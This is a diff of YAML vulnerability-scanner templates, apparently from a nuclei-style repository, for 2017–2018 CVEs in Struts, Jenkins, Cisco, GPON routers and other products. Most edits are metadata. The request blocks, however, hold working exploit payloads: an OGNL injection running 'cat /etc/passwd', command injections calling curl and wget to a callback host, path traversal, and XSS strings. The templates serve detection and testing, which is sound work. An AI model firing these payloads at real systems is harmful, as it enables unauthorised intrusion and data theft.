@@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-9140 - https://www.veracode.com/blog/research/anatomy-cross-site-scripting-flaw-telerik-reporting-module - http://www.telerik.com/support/whats-new/reporting/release-history/telerik-reporting-r1-2017-sp2-(version-11-0-17-406) + - https://knowledgebase.progress.com/articles/Article/Security-Advisory-for-Resolving-Security-vulnerabilities-September-2018 remediation: Upgrade to application version 11.0.17.406 (2017 SP2) or later. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9140 cwe-id: CWE-79 - tags: cve,cve2017,xss,telerik + epss-score: 0.0021 + cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: progress + product: telerik_reporting + tags: cve,cve2017,xss,telerik http: - method: GET @@ -27,12 +32,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - '#000000"onload="prompt(1)' - 'Telerik.ReportViewer.axd?name=Resources' condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 155a87a2b3..ff189cd1b2 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -10,14 +10,20 @@ info: - https://github.com/MindscapeHQ/raygun4wordpress/issues/16 - http://jgj212.blogspot.kr/2017/05/a-reflected-xss-vulnerability-in.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + - https://wpvulndb.com/vulnerabilities/8836 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-9288 cwe-id: CWE-79 - tags: cve,cve2017,wordpress,xss,wp-plugin + epss-score: 0.00168 + cpe: cpe:2.3:a:raygun:raygun4wp:1.8.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: raygun + product: raygun4wp + tags: cve,cve2017,wordpress,xss,wp-plugin http: - method: GET @@ -27,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index 56734d9b5b..f6d12d424b 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -14,9 +14,13 @@ info: cvss-score: 6.5 cve-id: CVE-2017-9416 cwe-id: CWE-22 + epss-score: 0.01465 + cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* metadata: max-request: 2 verified: true + vendor: odoo + product: odoo tags: cve,cve2017,odoo,lfi http: @@ -26,6 +30,7 @@ http: - "{{BaseURL}}/base_import/static/etc/passwd" stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 291b81f707..d803badb4e 100644 --- a/http/cves/2017/CVE-2017-9506.yaml +++ b/http/cves/2017/CVE-2017-9506.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2017-9506 cwe-id: CWE-918 + epss-score: 0.00575 + cpe: cpe:2.3:a:atlassian:oauth:1.3.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Atlassian Jira" + vendor: atlassian + product: oauth tags: cve,cve2017,atlassian,jira,ssrf,oast http: @@ -29,6 +33,6 @@ http: matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2017/CVE-2017-9791.yaml b/http/cves/2017/CVE-2017-9791.yaml index e7a4823c1f..9b9ef09ad2 100644 --- a/http/cves/2017/CVE-2017-9791.yaml +++ b/http/cves/2017/CVE-2017-9791.yaml @@ -10,36 +10,40 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - http://struts.apache.org/docs/s2-048.html - http://web.archive.org/web/20211207175819/https://securitytracker.com/id/1038838 + - http://www.securitytracker.com/id/1038838 + - https://security.netapp.com/advisory/ntap-20180706-0002/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-9791 cwe-id: CWE-20 - cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* - epss-score: 0.9753 + epss-score: 0.97502 + cpe: cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: title:"Struts2 Showcase" fofa-query: title="Struts2 Showcase" + vendor: apache + product: struts tags: cve,cve2017,apache,rce,struts,kev - variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" result: "{{to_number(num1)*to_number(num2)}}" # CMD: %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat /etc/passwd').getInputStream())).(#q)} - http: - method: POST path: - "{{BaseURL}}/integration/saveGangster.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%28{{num1}}%2a{{num2}}%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description= + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - type: word diff --git a/http/cves/2017/CVE-2017-9805.yaml b/http/cves/2017/CVE-2017-9805.yaml index 7aa96e2b33..4805e90355 100644 --- a/http/cves/2017/CVE-2017-9805.yaml +++ b/http/cves/2017/CVE-2017-9805.yaml @@ -9,22 +9,27 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-9805-3889403.html - https://struts.apache.org/docs/s2-052.html - https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + - http://www.securitytracker.com/id/1039263 + - https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.1 cve-id: CVE-2017-9805 cwe-id: CWE-502 - tags: cve,cve2017,apache,rce,struts,kev + epss-score: 0.97539 + cpe: cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: apache + product: struts + tags: cve,cve2017,apache,rce,struts,kev http: - method: POST path: - "{{BaseURL}}/struts2-rest-showcase/orders/3" - "{{BaseURL}}/orders/3" - headers: - Content-Type: application/xml + body: | @@ -84,9 +89,11 @@ http: + headers: + Content-Type: application/xml + matchers-condition: and matchers: - - type: word words: - "Debugging information" diff --git a/http/cves/2017/CVE-2017-9822.yaml b/http/cves/2017/CVE-2017-9822.yaml index 11e25e420d..d002188cf8 100644 --- a/http/cves/2017/CVE-2017-9822.yaml +++ b/http/cves/2017/CVE-2017-9822.yaml @@ -9,17 +9,19 @@ info: - https://github.com/murataydemir/CVE-2017-9822 - https://nvd.nist.gov/vuln/detail/CVE-2017-9822 - http://www.dnnsoftware.com/community/security/security-center - - http://web.archive.org/web/20210124123810/https://www.securityfocus.com/bid/102213/ + - http://packetstormsecurity.com/files/157080/DotNetNuke-Cookie-Deserialization-Remote-Code-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2017-9822 cwe-id: CWE-20 + epss-score: 0.97064 cpe: cpe:2.3:a:dnnsoftware:dotnetnuke:*:*:*:*:*:*:*:* - epss-score: 0.97311 - tags: cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev metadata: max-request: 1 + vendor: dnnsoftware + product: dotnetnuke + tags: packetstorm,cve,cve2017,dotnetnuke,bypass,rce,deserialization,kev http: - raw: @@ -33,10 +35,10 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '[extensions]' - 'for 16-bit app support' - part: body condition: and - type: status diff --git a/http/cves/2017/CVE-2017-9833.yaml b/http/cves/2017/CVE-2017-9833.yaml index 903ce2485e..4d0755ceba 100644 --- a/http/cves/2017/CVE-2017-9833.yaml +++ b/http/cves/2017/CVE-2017-9833.yaml @@ -15,11 +15,13 @@ info: cvss-score: 7.5 cve-id: CVE-2017-9833 cwe-id: CWE-22 - cpe: cpe:2.3:a:boa:boa:*:*:*:*:*:*:*:* - epss-score: 0.90626 - tags: boa,lfr,lfi,cve,cve2017,edb + epss-score: 0.48044 + cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: boa + product: boa + tags: boa,lfr,lfi,cve,cve2017,edb http: - method: GET diff --git a/http/cves/2017/CVE-2017-9841.yaml b/http/cves/2017/CVE-2017-9841.yaml index c06660b380..a4e08d936c 100644 --- a/http/cves/2017/CVE-2017-9841.yaml +++ b/http/cves/2017/CVE-2017-9841.yaml @@ -16,13 +16,15 @@ info: cvss-score: 9.8 cve-id: CVE-2017-9841 cwe-id: CWE-94 - epss-score: 0.9749 - tags: cve,cve2017,php,phpunit,rce,kev + epss-score: 0.97488 + cpe: cpe:2.3:a:phpunit_project:phpunit:*:*:*:*:*:*:*:* metadata: max-request: 6 + vendor: phpunit_project + product: phpunit + tags: cve,cve2017,php,phpunit,rce,kev http: - - raw: - | GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 @@ -30,35 +32,30 @@ http: Content-Type: text/html - - | GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} Content-Type: text/html - - | GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: {{Hostname}} @@ -69,9 +66,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "6dd70f16549456495373a337e6708865" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-0127.yaml b/http/cves/2018/CVE-2018-0127.yaml index 90a739e31e..b5e88c3e6a 100644 --- a/http/cves/2018/CVE-2018-0127.yaml +++ b/http/cves/2018/CVE-2018-0127.yaml @@ -8,17 +8,20 @@ info: reference: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180207-rv13x_2 - http://web.archive.org/web/20211207054802/https://securitytracker.com/id/1040345 - - http://web.archive.org/web/20210226170218/https://www.securityfocus.com/bid/102969 - https://nvd.nist.gov/vuln/detail/CVE-2018-0127 + - http://www.securitytracker.com/id/1040345 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-0127 - cwe-id: CWE-306 - epss-score: 0.13216 - tags: cve,cve2018,cisco,router + cwe-id: CWE-306,CWE-200 + epss-score: 0.08908 + cpe: cpe:2.3:o:cisco:rv132w_firmware:1.0.0.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: "cisco" + product: rv132w_firmware + tags: cve,cve2018,cisco,router http: - method: GET @@ -27,15 +30,15 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: body - condition: and words: - "Dump" - "MDM" - "cisco" - "admin" + condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-0296.yaml b/http/cves/2018/CVE-2018-0296.yaml index a75fb12af8..58d877cbc5 100644 --- a/http/cves/2018/CVE-2018-0296.yaml +++ b/http/cves/2018/CVE-2018-0296.yaml @@ -11,20 +11,25 @@ info: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180606-asaftd - https://www.exploit-db.com/exploits/44956/ - https://nvd.nist.gov/vuln/detail/CVE-2018-0296 + - http://www.securitytracker.com/id/1041076 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cvss-score: 7.5 cve-id: CVE-2018-0296 - cwe-id: CWE-22 - epss-score: 0.97492 - tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev + cwe-id: CWE-20,CWE-22 + epss-score: 0.97461 + cpe: cpe:2.3:a:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: adaptive_security_appliance_software + tags: edb,cve,cve2018,cisco,lfi,traversal,asa,kev http: - method: GET path: - "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" + headers: Accept-Encoding: deflate diff --git a/http/cves/2018/CVE-2018-1000129.yaml b/http/cves/2018/CVE-2018-1000129.yaml index 3c4db646de..61215e03fd 100644 --- a/http/cves/2018/CVE-2018-1000129.yaml +++ b/http/cves/2018/CVE-2018-1000129.yaml @@ -17,9 +17,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-1000129 cwe-id: CWE-79 - tags: cve,cve2018,jolokia,xss + epss-score: 0.00232 + cpe: cpe:2.3:a:jolokia:jolokia:1.3.7:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: jolokia + product: jolokia + tags: cve,cve2018,jolokia,xss http: - method: GET @@ -28,9 +32,9 @@ http: - "{{BaseURL}}/jolokia/read?mimeType=text/html" stop-at-first-match: true + matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/cves/2018/CVE-2018-1000130.yaml b/http/cves/2018/CVE-2018-1000130.yaml index a6e17652e4..2bf857215d 100644 --- a/http/cves/2018/CVE-2018-1000130.yaml +++ b/http/cves/2018/CVE-2018-1000130.yaml @@ -5,7 +5,7 @@ info: author: milo2012 severity: high description: | - Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode. + Jolokia agent is vulnerable to a JNDI injection vulnerability that allows a remote attacker to run arbitrary Java code on the server when the agent is in proxy mode. reference: - https://jolokia.org/#Security_fixes_with_1.5.0 - https://access.redhat.com/errata/RHSA-2018:2669 @@ -15,9 +15,13 @@ info: cvss-score: 8.1 cve-id: CVE-2018-1000130 cwe-id: CWE-74 - tags: cve,cve2018,jolokia,rce,jndi,proxy + epss-score: 0.90131 + cpe: cpe:2.3:a:jolokia:webarchive_agent:1.3.7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: jolokia + product: webarchive_agent + tags: cve,cve2018,jolokia,rce,jndi,proxy http: - raw: diff --git a/http/cves/2018/CVE-2018-1000226.yaml b/http/cves/2018/CVE-2018-1000226.yaml index 6db4bd4968..bc35701862 100644 --- a/http/cves/2018/CVE-2018-1000226.yaml +++ b/http/cves/2018/CVE-2018-1000226.yaml @@ -14,9 +14,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000226 cwe-id: CWE-732 - tags: cve,cve2018,cobbler,auth-bypass + epss-score: 0.01552 + cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cobblerd + product: cobbler + tags: cve,cve2018,cobbler,auth-bypass http: - raw: @@ -39,9 +43,9 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 + - type: dsl + dsl: + - "!contains(tolower(body), 'faultCode')" - type: word part: header @@ -53,11 +57,11 @@ http: words: - "" - - type: dsl - dsl: - - "!contains(tolower(body), 'faultCode')" - - type: regex part: body regex: - "(.*[a-zA-Z0-9].+==)" + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-1000533.yaml b/http/cves/2018/CVE-2018-1000533.yaml index 1980dbd067..0999bfcb78 100644 --- a/http/cves/2018/CVE-2018-1000533.yaml +++ b/http/cves/2018/CVE-2018-1000533.yaml @@ -15,18 +15,19 @@ info: cvss-score: 9.8 cve-id: CVE-2018-1000533 cwe-id: CWE-20 + epss-score: 0.97207 cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* - epss-score: 0.97249 - tags: git,cve,cve2018,gitlist,vulhub,rce metadata: max-request: 2 + vendor: gitlist + product: gitlist + tags: git,cve,cve2018,gitlist,vulhub,rce http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /{{path}}/tree/a/search HTTP/1.1 Host: {{Hostname}} @@ -34,17 +35,17 @@ http: query=--open-files-in-pager=cat%20/etc/passwd + matchers: + - type: word + part: body + words: + - "root:/root:/bin/bash" + extractors: - type: regex name: path group: 1 - internal: true - part: body regex: - '(.*?)' - - matchers: - - type: word - words: - - "root:/root:/bin/bash" + internal: true part: body diff --git a/http/cves/2018/CVE-2018-1000600.yaml b/http/cves/2018/CVE-2018-1000600.yaml index 828b660f02..728b0894ef 100644 --- a/http/cves/2018/CVE-2018-1000600.yaml +++ b/http/cves/2018/CVE-2018-1000600.yaml @@ -5,7 +5,7 @@ info: author: geeknik severity: high description: | - Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. + Jenkins GitHub Plugin 1.29.1 and earlier is susceptible to server-side request forgery via GitHubTokenCredentialsCreator.java, which allows attackers to leverage attacker-specified credentials IDs obtained through another method and capture the credentials stored in Jenkins. reference: - https://www.jenkins.io/security/advisory/2018-06-25/#SECURITY-915 - https://devco.re/blog/2019/01/16/hacking-Jenkins-part1-play-with-dynamic-routing/ @@ -16,9 +16,14 @@ info: cvss-score: 8.8 cve-id: CVE-2018-1000600 cwe-id: CWE-200 - tags: cve,cve2018,jenkins,ssrf,oast,github + epss-score: 0.95579 + cpe: cpe:2.3:a:jenkins:github:*:*:*:*:*:jenkins:*:* metadata: max-request: 1 + framework: jenkins + vendor: jenkins + product: github + tags: cve,cve2018,jenkins,ssrf,oast,github http: - method: GET diff --git a/http/cves/2018/CVE-2018-1000671.yaml b/http/cves/2018/CVE-2018-1000671.yaml index 602d4e3a03..d87dad94c5 100644 --- a/http/cves/2018/CVE-2018-1000671.yaml +++ b/http/cves/2018/CVE-2018-1000671.yaml @@ -9,15 +9,21 @@ info: - https://github.com/sympa-community/sympa/issues/268 - https://vuldb.com/?id.123670 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000671 + - https://lists.debian.org/debian-lts-announce/2018/09/msg00023.html + - https://lists.debian.org/debian-lts-announce/2020/11/msg00015.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-1000671 cwe-id: CWE-601 + epss-score: 0.00831 + cpe: cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.html:"sympa" verified: true + vendor: sympa + product: sympa tags: cve,cve2018,redirect,sympa,debian http: diff --git a/http/cves/2018/CVE-2018-1000856.yaml b/http/cves/2018/CVE-2018-1000856.yaml index b0b76eeeae..bd398df9a8 100644 --- a/http/cves/2018/CVE-2018-1000856.yaml +++ b/http/cves/2018/CVE-2018-1000856.yaml @@ -14,14 +14,17 @@ info: cvss-score: 4.8 cve-id: CVE-2018-1000856 cwe-id: CWE-79 + epss-score: 0.00101 + cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: max-request: 3 verified: true + vendor: domainmod + product: domainmod tags: cve,cve2018,domainmod,xss,authenticated http: - raw: - - | POST / HTTP/1.1 Host: {{Hostname}} @@ -34,7 +37,6 @@ http: Content-Type: application/x-www-form-urlencoded new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test - - | GET /segments/ HTTP/1.1 Host: {{Hostname}} @@ -43,6 +45,7 @@ http: cookie-reuse: true host-redirects: true max-redirects: 3 + matchers-condition: and matchers: - type: word diff --git a/http/cves/2018/CVE-2018-1000861.yaml b/http/cves/2018/CVE-2018-1000861.yaml index 67d5769414..a6151d39bc 100644 --- a/http/cves/2018/CVE-2018-1000861.yaml +++ b/http/cves/2018/CVE-2018-1000861.yaml @@ -9,16 +9,20 @@ info: - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861 - https://nvd.nist.gov/vuln/detail/CVE-2018-1000861 - https://jenkins.io/security/advisory/2018-12-05/#SECURITY-595 - - http://web.archive.org/web/20210421212616/https://www.securityfocus.com/bid/106176 + - http://packetstormsecurity.com/files/166778/Jenkins-Remote-Code-Execution.html + - https://access.redhat.com/errata/RHBA-2019:0024 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-1000861 cwe-id: CWE-502 - epss-score: 0.97348 - tags: kev,vulhub,cve,cve2018,rce,jenkins + epss-score: 0.97412 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: max-request: 1 + vendor: jenkins + product: jenkins + tags: packetstorm,kev,vulhub,cve,cve2018,rce,jenkins http: - method: GET @@ -27,11 +31,10 @@ http: matchers-condition: and matchers: - - type: word + part: body words: - "package#vulntest" - part: body - type: status status: diff --git a/http/cves/2018/CVE-2018-10093.yaml b/http/cves/2018/CVE-2018-10093.yaml index 4273463bec..bab9584516 100644 --- a/http/cves/2018/CVE-2018-10093.yaml +++ b/http/cves/2018/CVE-2018-10093.yaml @@ -16,9 +16,13 @@ info: cvss-score: 8.8 cve-id: CVE-2018-10093 cwe-id: CWE-862 - tags: cve,cve2018,rce,iot,audiocode,edb,seclists + epss-score: 0.06287 + cpe: cpe:2.3:o:audiocodes:420hd_ip_phone_firmware:2.2.12.126:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: audiocodes + product: 420hd_ip_phone_firmware + tags: cve,cve2018,rce,iot,audiocode,edb,seclists http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "admin:.*:*sh$" diff --git a/http/cves/2018/CVE-2018-10095.yaml b/http/cves/2018/CVE-2018-10095.yaml index 1273af5a80..dcbcdc6307 100644 --- a/http/cves/2018/CVE-2018-10095.yaml +++ b/http/cves/2018/CVE-2018-10095.yaml @@ -11,14 +11,19 @@ info: - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog - https://nvd.nist.gov/vuln/detail/CVE-2018-10095 + - http://www.openwall.com/lists/oss-security/2018/05/21/3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10095 cwe-id: CWE-79 - tags: cve,cve2018,xss,dolibarr + epss-score: 0.95296 + cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dolibarr + product: dolibarr + tags: cve,cve2018,xss,dolibarr http: - method: GET @@ -28,15 +33,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - - - type: status - status: - - 200 - type: word part: header words: - text/html + + - type: status + status: + - 200 diff --git a/http/cves/2018/CVE-2018-10141.yaml b/http/cves/2018/CVE-2018-10141.yaml index d167202ec1..c7b4fd2fad 100644 --- a/http/cves/2018/CVE-2018-10141.yaml +++ b/http/cves/2018/CVE-2018-10141.yaml @@ -13,9 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10141 cwe-id: CWE-79 - tags: cve,cve2018,panos,vpn,globalprotect,xss + epss-score: 0.00126 + cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: paloaltonetworks + product: pan-os + tags: cve,cve2018,panos,vpn,globalprotect,xss http: - method: GET diff --git a/http/cves/2018/CVE-2018-10201.yaml b/http/cves/2018/CVE-2018-10201.yaml index c3ea669cef..4a6658a245 100644 --- a/http/cves/2018/CVE-2018-10201.yaml +++ b/http/cves/2018/CVE-2018-10201.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2018-10201 - http://www.kwell.net/kwell_blog/?p=5199 - https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es + - https://support.ncomputing.com/portal/kb/articles/ncomputing-health-monitor-server-vulnerability-patch classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2018-10201 cwe-id: CWE-22 - tags: cve2018,ncomputing,lfi,packetstorm,cve + epss-score: 0.07642 + cpe: cpe:2.3:a:ncomputing:vspace_pro:10:*:*:*:*:*:*:* metadata: max-request: 4 + vendor: ncomputing + product: vspace_pro + tags: cve2018,ncomputing,lfi,packetstorm,cve http: - method: GET diff --git a/http/cves/2018/CVE-2018-10230.yaml b/http/cves/2018/CVE-2018-10230.yaml index 87485aa36f..e2ad284c7d 100644 --- a/http/cves/2018/CVE-2018-10230.yaml +++ b/http/cves/2018/CVE-2018-10230.yaml @@ -15,9 +15,13 @@ info: cvss-score: 6.1 cve-id: CVE-2018-10230 cwe-id: CWE-79 - tags: cve,cve2018,xss,zend + epss-score: 0.00122 + cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: zend + product: zend_server + tags: cve,cve2018,xss,zend http: - method: GET diff --git a/http/cves/2018/CVE-2018-10562.yaml b/http/cves/2018/CVE-2018-10562.yaml index fcb271bd0f..8c4b6802f1 100644 --- a/http/cves/2018/CVE-2018-10562.yaml +++ b/http/cves/2018/CVE-2018-10562.yaml @@ -15,10 +15,13 @@ info: cvss-score: 9.8 cve-id: CVE-2018-10562 cwe-id: CWE-78 - tags: cve,cve2018,dasan,gpon,rce,oast,kev + epss-score: 0.97572 + cpe: cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: dasannetworks + product: gpon_router_firmware + tags: cve,cve2018,dasan,gpon,rce,oast,kev variables: useragent: '{{rand_base(6)}}' @@ -29,7 +32,6 @@ http: Host: {{Hostname}} XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0 - - | POST /GponForm/diag_Form?images/ HTTP/1.1 Host: {{Hostname}} @@ -37,10 +39,11 @@ http: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0 stop-at-first-match: true + matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2018/CVE-2018-10818.yaml b/http/cves/2018/CVE-2018-10818.yaml index cdd181294b..3cf9e915dc 100644 --- a/http/cves/2018/CVE-2018-10818.yaml +++ b/http/cves/2018/CVE-2018-10818.yaml @@ -11,10 +11,9 @@ info: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-10818 classification: cve-id: CVE-2018-10818 - tags: cve,cve2018,lg-nas,rce,oast,injection metadata: max-request: 2 - + tags: cve,cve2018,lg-nas,rce,oast,injection variables: useragent: '{{rand_base(6)}}' @@ -26,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded &uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}' - - | POST /en/php/usb_sync.php HTTP/1.1 Host: {{Hostname}} @@ -35,10 +33,11 @@ http: 